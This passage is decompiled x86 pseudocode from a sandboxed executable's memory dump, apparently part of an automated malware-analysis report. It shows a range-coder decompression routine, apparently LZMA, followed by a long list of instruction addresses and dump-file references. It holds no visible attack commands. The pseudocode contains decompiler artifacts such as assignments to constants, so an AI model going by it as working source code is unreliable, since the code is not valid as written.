                                      							__eax =  *(__ebp - 0x30);
                                      							__eflags = __eax - 4;
                                      							if(__eax >= 4) {
                                      								_push(3);
                                      								_pop(__eax);
                                      							}
                                      							__ecx =  *(__ebp - 4);
                                      							 *(__ebp - 0x40) = 6;
                                      							__eax = __eax << 7;
                                      							 *(__ebp - 0x7c) = 0x19;
                                      							 *(__ebp - 0x58) = __eax;
                                      							goto L145;
                                      						case 0x17:
                                      							L145:
                                      							__eax =  *(__ebp - 0x40);
                                      							 *(__ebp - 0x50) = 1;
                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      							goto L149;
                                      						case 0x18:
                                      							L146:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0x18;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t484 = __ebp - 0x70;
                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t484;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							L148:
                                      							_t487 = __ebp - 0x48;
                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                      							__eflags =  *_t487;
                                      							L149:
                                      							__eflags =  *(__ebp - 0x48);
                                      							if( *(__ebp - 0x48) <= 0) {
                                      								__ecx =  *(__ebp - 0x40);
                                      								__ebx =  *(__ebp - 0x50);
                                      								0 = 1;
                                      								__eax = 1 << __cl;
                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      								__eax =  *(__ebp - 0x7c);
                                      								 *(__ebp - 0x44) = __ebx;
                                      								goto L140;
                                      							}
                                      							__eax =  *(__ebp - 0x50);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      							__eax =  *(__ebp - 0x58);
                                      							__esi = __edx + __eax;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__ax =  *__esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								__cx = __ax >> 5;
                                      								__eax = __eax - __ecx;
                                      								__edx = __edx + 1;
                                      								__eflags = __edx;
                                      								 *__esi = __ax;
                                      								 *(__ebp - 0x50) = __edx;
                                      							} else {
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								goto L148;
                                      							} else {
                                      								goto L146;
                                      							}
                                      						case 0x19:
                                      							__eflags = __ebx - 4;
                                      							if(__ebx < 4) {
                                      								 *(__ebp - 0x2c) = __ebx;
                                      								L119:
                                      								_t393 = __ebp - 0x2c;
                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                      								__eflags =  *_t393;
                                      								L120:
                                      								__eax =  *(__ebp - 0x2c);
                                      								__eflags = __eax;
                                      								if(__eax == 0) {
                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      									goto L170;
                                      								}
                                      								__eflags = __eax -  *(__ebp - 0x60);
                                      								if(__eax >  *(__ebp - 0x60)) {
                                      									goto L171;
                                      								}
                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      								__eax =  *(__ebp - 0x30);
                                      								_t400 = __ebp - 0x60;
                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      								__eflags =  *_t400;
                                      								goto L123;
                                      							}
                                      							__ecx = __ebx;
                                      							__eax = __ebx;
                                      							__ecx = __ebx >> 1;
                                      							__eax = __ebx & 0x00000001;
                                      							__ecx = (__ebx >> 1) - 1;
                                      							__al = __al | 0x00000002;
                                      							__eax = (__ebx & 0x00000001) << __cl;
                                      							__eflags = __ebx - 0xe;
                                      							 *(__ebp - 0x2c) = __eax;
                                      							if(__ebx >= 0xe) {
                                      								__ebx = 0;
                                      								 *(__ebp - 0x48) = __ecx;
                                      								L102:
                                      								__eflags =  *(__ebp - 0x48);
                                      								if( *(__ebp - 0x48) <= 0) {
                                      									__eax = __eax + __ebx;
                                      									 *(__ebp - 0x40) = 4;
                                      									 *(__ebp - 0x2c) = __eax;
                                      									__eax =  *(__ebp - 4);
                                      									__eax =  *(__ebp - 4) + 0x644;
                                      									__eflags = __eax;
                                      									L108:
                                      									__ebx = 0;
                                      									 *(__ebp - 0x58) = __eax;
                                      									 *(__ebp - 0x50) = 1;
                                      									 *(__ebp - 0x44) = 0;
                                      									 *(__ebp - 0x48) = 0;
                                      									L112:
                                      									__eax =  *(__ebp - 0x40);
                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      										_t391 = __ebp - 0x2c;
                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      										__eflags =  *_t391;
                                      										goto L119;
                                      									}
                                      									__eax =  *(__ebp - 0x50);
                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      									__eax =  *(__ebp - 0x58);
                                      									__esi = __edi + __eax;
                                      									 *(__ebp - 0x54) = __esi;
                                      									__ax =  *__esi;
                                      									__ecx = __ax & 0x0000ffff;
                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                      									if( *(__ebp - 0xc) >= __edx) {
                                      										__ecx = 0;
                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      										__ecx = 1;
                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      										__ebx = 1;
                                      										__ecx =  *(__ebp - 0x48);
                                      										__ebx = 1 << __cl;
                                      										__ecx = 1 << __cl;
                                      										__ebx =  *(__ebp - 0x44);
                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                      										__cx = __ax;
                                      										__cx = __ax >> 5;
                                      										__eax = __eax - __ecx;
                                      										__edi = __edi + 1;
                                      										__eflags = __edi;
                                      										 *(__ebp - 0x44) = __ebx;
                                      										 *__esi = __ax;
                                      										 *(__ebp - 0x50) = __edi;
                                      									} else {
                                      										 *(__ebp - 0x10) = __edx;
                                      										0x800 = 0x800 - __ecx;
                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      										 *__esi = __dx;
                                      									}
                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                      										L111:
                                      										_t368 = __ebp - 0x48;
                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                      										__eflags =  *_t368;
                                      										goto L112;
                                      									} else {
                                      										goto L109;
                                      									}
                                      								}
                                      								__ecx =  *(__ebp - 0xc);
                                      								__ebx = __ebx + __ebx;
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      								 *(__ebp - 0x44) = __ebx;
                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      									__ecx =  *(__ebp - 0x10);
                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      									__ebx = __ebx | 0x00000001;
                                      									__eflags = __ebx;
                                      									 *(__ebp - 0x44) = __ebx;
                                      								}
                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                      									L101:
                                      									_t338 = __ebp - 0x48;
                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                      									__eflags =  *_t338;
                                      									goto L102;
                                      								} else {
                                      									goto L99;
                                      								}
                                      							}
                                      							__edx =  *(__ebp - 4);
                                      							__eax = __eax - __ebx;
                                      							 *(__ebp - 0x40) = __ecx;
                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      							goto L108;
                                      						case 0x1a:
                                      							L56:
                                      							__eflags =  *(__ebp - 0x64);
                                      							if( *(__ebp - 0x64) == 0) {
                                      								 *(__ebp - 0x88) = 0x1a;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x68);
                                      							__al =  *(__ebp - 0x5c);
                                      							__edx =  *(__ebp - 8);
                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      							 *( *(__ebp - 0x68)) = __al;
                                      							__ecx =  *(__ebp - 0x14);
                                      							 *(__ecx +  *(__ebp - 8)) = __al;
                                      							__eax = __ecx + 1;
                                      							__edx = 0;
                                      							_t192 = __eax %  *(__ebp - 0x74);
                                      							__eax = __eax /  *(__ebp - 0x74);
                                      							__edx = _t192;
                                      							goto L79;
                                      						case 0x1b:
                                      							goto L75;
                                      						case 0x1c:
                                      							while(1) {
                                      								L123:
                                      								__eflags =  *(__ebp - 0x64);
                                      								if( *(__ebp - 0x64) == 0) {
                                      									break;
                                      								}
                                      								__eax =  *(__ebp - 0x14);
                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      								__eflags = __eax -  *(__ebp - 0x74);
                                      								if(__eax >=  *(__ebp - 0x74)) {
                                      									__eax = __eax +  *(__ebp - 0x74);
                                      									__eflags = __eax;
                                      								}
                                      								__edx =  *(__ebp - 8);
                                      								__cl =  *(__eax + __edx);
                                      								__eax =  *(__ebp - 0x14);
                                      								 *(__ebp - 0x5c) = __cl;
                                      								 *(__eax + __edx) = __cl;
                                      								__eax = __eax + 1;
                                      								__edx = 0;
                                      								_t414 = __eax %  *(__ebp - 0x74);
                                      								__eax = __eax /  *(__ebp - 0x74);
                                      								__edx = _t414;
                                      								__eax =  *(__ebp - 0x68);
                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      								__eflags =  *(__ebp - 0x30);
                                      								 *( *(__ebp - 0x68)) = __cl;
                                      								 *(__ebp - 0x14) = _t414;
                                      								if( *(__ebp - 0x30) > 0) {
                                      									continue;
                                      								} else {
                                      									goto L80;
                                      								}
                                      							}
                                      							 *(__ebp - 0x88) = 0x1c;
                                      							goto L170;
                                      					}
                                      				}
                                      			}













                                      0x00000000
                                      0x004070ab
                                      0x004070ab
                                      0x004070af
                                      0x00407166
                                      0x00407169
                                      0x00407175
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x004073cb
                                      0x004073cb
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040741c
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x00000000
                                      0x004075cf
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00000000
                                      0x0040743e
                                      0x004070b5
                                      0x004070b9
                                      0x004075fa
                                      0x004075fa
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x004070bf
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x00000000
                                      0x004075f6
                                      0x004070d9
                                      0x004070dc
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x0040710d
                                      0x0040710d
                                      0x0040710d
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00000000
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x00000000
                                      0x00406dec
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00406dc8
                                      0x00000000
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x00000000
                                      0x00000000
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x00000000
                                      0x00407137
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x00000000
                                      0x004073c8
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00000000
                                      0x0040753b
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x00000000
                                      0x00407390
                                      0x0040738e
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
